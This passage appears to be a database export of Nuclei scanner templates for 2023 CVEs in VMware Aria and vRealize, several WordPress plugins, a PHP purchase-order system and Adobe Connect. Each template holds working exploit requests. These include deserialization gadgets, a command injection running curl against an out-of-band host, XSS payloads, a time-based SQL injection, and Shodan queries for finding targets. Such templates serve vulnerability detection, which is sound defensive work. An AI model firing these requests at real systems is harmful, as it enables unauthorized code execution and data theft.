4a0a00473045022100cd38bff86e643f91db88d9a1590d35b1839285be73b6dbc31c8f0b1ad50f57020220594ae2e7d9f3dbf289a732848e92543eb02be8752b29df3f8de781957d536475:922c64590222798bb761d5b6d8e72950", "hash": "79d7fc47b8020f77ec35ce5c17c95f58", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308616" }, "name": "CVE-2023-20864.yaml", "content": "id: CVE-2023-20864\n\ninfo:\n name: VMware Aria Operations for Logs - Unauthenticated Remote Code Execution\n author: rootxharsh,iamnoooob,pdresearch\n severity: critical\n description: |\n VMware Aria Operations for Logs contains a deserialization vulnerability. An unauthenticated, malicious actor with network access to VMware Aria Operations for Logs may be able to execute arbitrary code as root.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the necessary security patches or updates provided by VMware to mitigate this vulnerability.\n reference:\n - https://www.vmware.com/security/advisories/VMSA-2023-0007.html\n - https://nvd.nist.gov/vuln/detail/CVE-2023-20864\n - https://github.com/Threekiii/CVE\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-20864\n cwe-id: CWE-502\n epss-score: 0.29094\n epss-percentile: 0.96766\n cpe: cpe:2.3:a:vmware:aria_operations_for_logs:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: vmware\n product: aria_operations_for_logs\n shodan-query: title:\"vRealize Log Insight\"\n tags: cve2023,cve,vmware,aria,rce,oast\n\nhttp:\n - raw:\n - |\n GET /csrf HTTP/1.1\n Host: {{Hostname}}\n X-Csrf-Token: Fetch\n - |\n POST /api/v2/internal/cluster/applyMembership HTTP/1.1\n Host: {{Hostname}}\n X-CSRF-Token: {{xcsrftoken}}\n Content-type: application/octet-stream\n\n {{generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"raw\")}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - \"dns\"\n\n - type: word\n part: body\n words:\n - '\"errorMessage\":\"Internal error'\n\n extractors:\n - type: kval\n name: xcsrftoken\n group: 1\n internal: true\n kval:\n - \"X_CSRF_Token\"\n# digest: 4b0a00483046022100d81a1f67f8e41f50b8995bae686ab49b507ce0fa2517c60658b8ac8630d9871a022100def2a9f72d0bdacf1fba5cc1236dac40a103ff7edb620cff13fc41f501660326:922c64590222798bb761d5b6d8e72950", "hash": "6b827968eb67bb31feae2311f77bbc03", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308617" }, "name": "CVE-2023-20887.yaml", "content": "id: CVE-2023-20887\n\ninfo:\n name: VMware VRealize Network Insight - Remote Code Execution\n author: sinsinology\n severity: critical\n description: |\n VMWare Aria Operations for Networks (vRealize Network Insight) is vulnerable to command injection when accepting user input through the Apache Thrift RPC interface. This vulnerability allows a remote unauthenticated attacker to execute arbitrary commands on the underlying operating system as the root user. The RPC interface is protected by a reverse proxy which can be bypassed. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. A malicious actor can get remote code execution in the context of 'root' on the appliance. VMWare 6.x version are\n vulnerable.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches provided by VMware to mitigate this vulnerability.\n reference:\n - https://www.vmware.com/security/advisories/VMSA-2023-0012.html\n - https://summoning.team/blog/vmware-vrealize-network-insight-rce-cve-2023-20887/\n - https://github.com/sinsinology/CVE-2023-20887\n - http://packetstormsecurity.com/files/173761/VMWare-Aria-Operations-For-Networks-Remote-Command-Execution.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-20887\n cwe-id: CWE-77\n epss-score: 0.96408\n epss-percentile: 0.99538\n cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: vmware\n product: vrealize_network_insight\n shodan-query: title:\"VMware vRealize Network Insight\"\n fofa-query: title=\"VMware vRealize Network Insight\"\n tags: cve2023,cve,packetstorm,vmware,rce,msf,vrealize,insight,oast,kev\nvariables:\n cmd: \"curl {{interactsh-url}}\"\n\nhttp:\n - raw:\n - |\n POST /saas./resttosaasservlet HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-thrift\n\n [1,\"createSupportBundle\",1,0,{\"1\":{\"str\":\"1111\"},\"2\":{\"str\":\"`{{cmd}}`\"},\"3\":{\"str\":\"value3\"},\"4\":{\"lst\":[\"str\",2,\"AAAA\",\"BBBB\"]}}]\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '{\"rec\":'\n\n - type: word\n part: header\n words:\n - \"application/x-thrift\"\n\n - type: word\n part: body\n negative: true\n words:\n - \"Provided invalid node Id\"\n - \"Invalid nodeId\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100cef3e5e34cd635c23cf32fc104b9c643bc4b812046fc3e8ab1f2e0237b0c98c6022041d25ffbcfc8ed708d8e3cce28043e53ef71343b3a31238d065ba9f7e9d0f22a:922c64590222798bb761d5b6d8e72950", "hash": "8320139bef0fb993a907481530a7e194", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308618" }, "name": "CVE-2023-20888.yaml", "content": "id: CVE-2023-20888\n\ninfo:\n name: VMware Aria Operations for Networks - Remote Code Execution\n author: iamnoooob,rootxharsh,pdresearch\n severity: high\n description: |\n Aria Operations for Networks contains an authenticated deserialization vulnerability. A malicious actor with network access to VMware Aria Operations for Networks and valid 'member' role credentials may be able to perform a deserialization attack resulting in remote code execution.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches or updates provided by VMware to mitigate this vulnerability.\n reference:\n - https://www.vmware.com/security/advisories/VMSA-2023-0012.html\n - https://nvd.nist.gov/vuln/detail/CVE-2023-20888\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2023-20888\n cwe-id: CWE-502\n epss-score: 0.35911\n epss-percentile: 0.96766\n cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: vmware\n product: vrealize_network_insight\n shodan-query: title:\"VMware Aria Operations\"\n tags: cve2023,cve,vmware,aria,rce,authenticated,oast\n\nhttp:\n - raw:\n - |\n POST /api/auth/login HTTP/2\n Host: {{Hostname}}\n Content-Type: application/json;charset=UTF-8\n X-Vrni-Csrf-Token: null\n\n {\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n - |\n POST /api/events/push-notifications HTTP/2\n Host: {{Hostname}}\n X-Vrni-Csrf-Token: {{csrf}}\n Content-Type: application/json\n\n {\"endOffset\": \"{{ generate_java_gadget(\"dns\", \"http://{{interactsh-url}}\", \"base64\") }} \"}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - dns\n\n - type: status\n status:\n - 500\n\n extractors:\n - type: regex\n name: csrf\n group: 1\n regex:\n - 'csrfToken\":\"([a-z0-9A-Z/+=]+)\"'\n internal: true\n part: body\n# digest: 4a0a00473045022100fe3fd06bbd0a82bf33a0611564f97011c559e4cb49524a0a37df553c037ab05f02205cd1eae8785402529378a446c8007225d04aa7f647bb94f439d1b8dc33ab27db:922c64590222798bb761d5b6d8e72950", "hash": "2cbc69f1a0abcbdb7f56f2816bb88f86", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308619" }, "name": "CVE-2023-20889.yaml", "content": "id: CVE-2023-20889\n\ninfo:\n name: VMware Aria Operations for Networks - Code Injection Information Disclosure Vulnerability\n author: iamnoooob,rootxharsh,pdresearch\n severity: high\n description: |\n Aria Operations for Networks contains an information disclosure vulnerability. A malicious actor with network access to VMware Aria Operations for Networks may be able to perform a command injection attack resulting in information disclosure.\n impact: |\n Successful exploitation of this vulnerability can result in unauthorized access to sensitive information.\n remediation: |\n Apply the latest security patches provided by VMware to mitigate this vulnerability.\n reference:\n - https://www.zerodayinitiative.com/advisories/ZDI-23-842/\n - https://www.vmware.com/security/advisories/VMSA-2023-0012.html\n - https://nvd.nist.gov/vuln/detail/CVE-2023-20889\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2023-20889\n cwe-id: CWE-77\n epss-score: 0.09004\n epss-percentile: 0.94043\n cpe: cpe:2.3:a:vmware:vrealize_network_insight:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: vmware\n product: vrealize_network_insight\n shodan-query: title:\"VMware Aria Operations\"\n tags: cve2023,cve,vmware,aria,disclosure,authenticated,rce,oast,intrusive\nvariables:\n payload: location='http://{{interactsh-url}}'\n\nhttp:\n - raw:\n - |\n POST /api/auth/login HTTP/2\n Host: {{Hostname}}\n Content-Type: application/json;charset=UTF-8\n X-Vrni-Csrf-Token: null\n\n {\"username\":\"{{username}}\",\"password\":\"{{password}}\",\"domain\":\"localdomain\"}\n - |\n POST /api/pdfexport HTTP/2\n Host: {{Hostname}}\n X-Vrni-Csrf-Token: {{csrf}}\n Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFkpSYDWZ5w9YNjmh\n\n ------WebKitFormBoundaryFkpSYDWZ5w9YNjmh\n Content-Disposition: form-data; name=\"{{randstr}}\"\n\n \n \n \n Test\n \n \n

    \n \n \n ------WebKitFormBoundaryFkpSYDWZ5w9YNjmh--\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol\n words:\n - dns\n - http\n\n - type: word\n part: header_2\n words:\n - application/octet-stream\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: csrf\n group: 1\n regex:\n - csrfToken\":\"([a-z0-9A-Z/+=]+)\"\n internal: true\n part: body\n# digest: 4a0a004730450221008a1f0e02f6eac19878f28e73d5af976689cb0985da1e466a9ec0ec62c50c490002205fb72bf2476805961a6bb628582a35b82e6ae23650edd78967e82247099c3308:922c64590222798bb761d5b6d8e72950", "hash": "e0d7b9042884f5a9eaeed325ce3a9929", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30861a" }, "name": "CVE-2023-2122.yaml", "content": "id: CVE-2023-2122\n\ninfo:\n name: Image Optimizer by 10web < 1.0.26 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n remediation: Fixed in version 1.0.27\n reference:\n - https://wpscan.com/vulnerability/936fd93a-428d-4744-a4fc-c8da78dcbe78\n - https://wordpress.org/plugins/image-optimizer-wd/advanced/\n - https://nvd.nist.gov/vuln/detail/CVE-2023-2122\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2023-2122\n cwe-id: CWE-79\n epss-score: 0.00064\n epss-percentile: 0.26189\n cpe: cpe:2.3:a:10web:image_optimizer:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: \"true\"\n max-request: 2\n vendor: 10web\n product: image_optimizer\n framework: wordpress\n tags: cve2023,cve,wpscan,xss,image-optimizer-wd,wordpress,wp-plugin,wp,authenticated,10web\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=iowd_settings&msg=1&iowd_tabs_active=generalry8uo%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ef0cmo HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body_2, \"\")'\n - 'contains(body_2, \"Image optimizer\")'\n condition: and\n# digest: 490a0046304402205fa4a6a8bcbf2bab629155a7f4d02eb527d8635fd7393c5f399f423ee4cf8557022004a188c53439a2e745d2c34e4e734f4bf64d17d500314d2585f1a7c94badc180:922c64590222798bb761d5b6d8e72950", "hash": "cd0f675d61c9dcf4b0b6007f4d155ab6", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30861b" }, "name": "CVE-2023-2130.yaml", "content": "id: CVE-2023-2130\n\ninfo:\n name: Purchase Order Management v1.0 - SQL Injection\n author: theamanrawat\n severity: critical\n description: |\n A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/zitozito1/bug_report/blob/main/SQLi.md\n - https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2023-2130\n - https://vuldb.com/?ctiid.226206\n - https://vuldb.com/?id.226206\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2023-2130\n cwe-id: CWE-89\n epss-score: 0.01554\n epss-percentile: 0.85779\n cpe: cpe:2.3:a:purchase_order_management_system_project:purchase_order_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 1\n vendor: purchase_order_management_system_project\n product: purchase_order_management_system\n tags: cve2023,cve,sqli,purchase-order-management-system,purchase_order_management_system_project\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/suppliers/view_details.php?id=1'+AND+(SELECT+9687+FROM+(SELECT(SLEEP(6)))pnac)+AND+'ARHJ'='ARHJ\"\n\n matchers:\n - type: dsl\n dsl:\n - 'duration>=6'\n - 'status_code == 200'\n - 'contains(header, \"text/html\")'\n - 'contains(body, \"Supplier Name\")'\n condition: and\n# digest: 4a0a0047304502207610615b4d86f3776d899e52606e2d73d1e13ab8f1be83473221d6e08f7d7ac6022100c166cf185ded4ffb6629ece50af08cbb3480f06e618e633086ebf6bf5b2de618:922c64590222798bb761d5b6d8e72950", "hash": "088eb26854300c75d0683a6e90f00f36", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30861c" }, "name": "CVE-2023-2178.yaml", "content": "id: CVE-2023-2178\n\ninfo:\n name: Aajoda Testimonials < 2.2.2 - Cross-Site Scripting\n author: Farish\n severity: medium\n description: |\n The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Update Aajoda Testimonials plugin to version 2.2.2 or later to mitigate the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/e84b71f9-4208-4efb-90e8-1c778e7d2ebb\n - https://downloads.wordpress.org/plugin/aajoda-testimonials.2.1.0.zip\n - https://nvd.nist.gov/vuln/detail/CVE-2023-2178\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2023-2178\n cwe-id: CWE-79\n epss-score: 0.00078\n epss-percentile: 0.3232\n cpe: cpe:2.3:a:aajoda:aajoda_testimonials:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: aajoda\n product: aajoda_testimonials\n framework: wordpress\n tags: cve2023,cve,wpscan,wordpress,wp,wp-plugin,xss,authenticated,aajoda\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n POST /wp-admin/options-general.php?page=aajoda-testimonials HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n aajodatestimonials_opt_hidden=Y&aajoda_version=2.0&aajodatestimonials_code=%22%3E%3C%2Ftextarea%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E%0D%0A%0D%0A%0D%0A&Submit=Save\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\")'\n - 'contains(body_2, \"page_aajoda-testimonials\")'\n condition: and\n# digest: 4a0a00473045022100c74aeac54fc01cd88a31d603a084a840be0d2f754b0ef7b7bdebe414e15f8a8902201f30b83a2348f3b8479b1ff813a3d43c0d3e753579da02c956e300a33f94eb5c:922c64590222798bb761d5b6d8e72950", "hash": "0bccc41564389c44c5d68b2ba4002bca", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30861d" }, "name": "CVE-2023-22232.yaml", "content": "id: CVE-2023-22232\n\ninfo:\n name: Adobe Connect < 12.1.5 - Local File Disclosure\n author: 0xr2r\n severity: medium\n description: |\n Adobe Connect versions 11.4.5 (and earlier), 12.1.5 (and earlier) are affected by an Improper Access Control vulnerability that could result in a Security feature bypass. An attacker could leverage this vulnerability to impact the integrity of a minor feature. Exploitation of this issue does not require user interaction\n reference:\n - https://helpx.adobe.com/security/products/connect/apsb23-05.html\n - https://nvd.nist.gov/vuln/detail/CVE-2023-22232\n - http://packetstormsecurity.com/files/171390/Adobe-Connect-11.4.5-12.1.5-Local-File-Disclosure.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N\n cvss-score: 5.3\n cve-id: CVE-2023-22232\n cwe-id: CWE-284,NVD-CWE-noinfo\n epss-score: 0.13033\n epss-percentile: 0.95385\n cpe: cpe:2.3:a:adobe:connect:*:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: adobe\n product: connect\n shodan-query: title:\"Adobe Connect\"\n tags: packetstorm,cve2023,cve,adobe,lfd,download\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/system/download?download-url=/_a7/p49dm7f4qjyt/output/&name=exam.pdf\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Save to My Computer\"\n - \"exam.pdf\"\n - \"Click to Download\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d2644b825543fc67f02663f2acb50beba0821a8bfc2bc784906c2212b716c165022100fbf55e2f84b2a12206b0c96e16aa7f81405c4f6d3e40e73fbd909f2a5deb5583:922c64590222798bb761d5b6d8e72950", "hash": "e60b7293d050ffa8d10159a102fdfce8", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30861e" }, "name": "CVE-2023-2224.yaml", "content": "id: CVE-2023-2224\n\ninfo:\n name: Seo By 10Web < 1.2.7 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The SEO by 10Web WordPress plugin before 1.2.7 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n reference:\n - https://wpscan.com/vulnerability/a76b6d22-1e00-428a-8a04-12162bd0d992\n - https://packetstormsecurity.com/files/173725/WordPress-Seo-By-10Web-Cross-Site-Scripting.html\n - https://nvd.nist.gov/vuln/detail/CVE-2023-2224\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 4.8\n cve-id: CVE-2023-2224\n cwe-id: CWE-79\n epss-score: 0.00102\n epss-percentile: 0.41348\n cpe: cpe:2.3:a:10web:seo:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: 10web\n product: seo\n framework: wordpress\n tags: cve2023,cve,wpscan,packetstorm,wp,wordpress,wp-plugin,xss,seo,10web,authenticated\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=wdseo_sitemap HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /wp-admin/admin.php?page=wdseo_sitemap&id_message=2 HTTP/1.1\n Host: {{Hostname}}\n\n task=save&wd_settings%5Bsitemap%5D=1&wd_settings%5Bbing_verification%5D=&wd_settings%5Byandex_verification%5D=&wd_settings%5Bnotify_google%5D=0&wd_settings%5Bnotify_bing%5D=0&wd_settings%5Badditional_pages%5D%5B%5D=&wd_settings%5Badditional_pages%5D%5Bpage_url%5D%5B%5D=%22%3E%3Caudio+src%3Dx+onerror%3Dconfirm%28document.domain%29%3E&wd_settings%5Badditional_pages%5D%5Bpriority%5D%5B%5D=0&wd_settings%5Badditional_pages%5D%5Bfrequency%5D%5B%5D=always&wd_settings%5Badditional_pages%5D%5Blast_changed%5D%5B%5D=&wd_settings%5Bexclude_post_types%5D%5B%5D=&wd_settings%5Bexclude_taxonomies%5D%5B%5D=&wd_settings%5Bexclude_archives%5D%5B%5D=&wd_settings%5Bexclude_posts%5D=&wd_settings%5Bsitemap_image%5D=0&wd_settings%5Bsitemap_video%5D=0&wd_settings%5Bsitemap_stylesheet%5D=1&wd_settings%5Blimit%5D=1000&wd_settings%5Bautoupdate_sitemap%5D=0&nonce_wdseo={{nonce}}&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dwdseo_sitemap%26id_message%3D1\n\n matchers-condition: and\n matchers:\n - type: word\n part: body_3\n words:\n - 'value=\"\">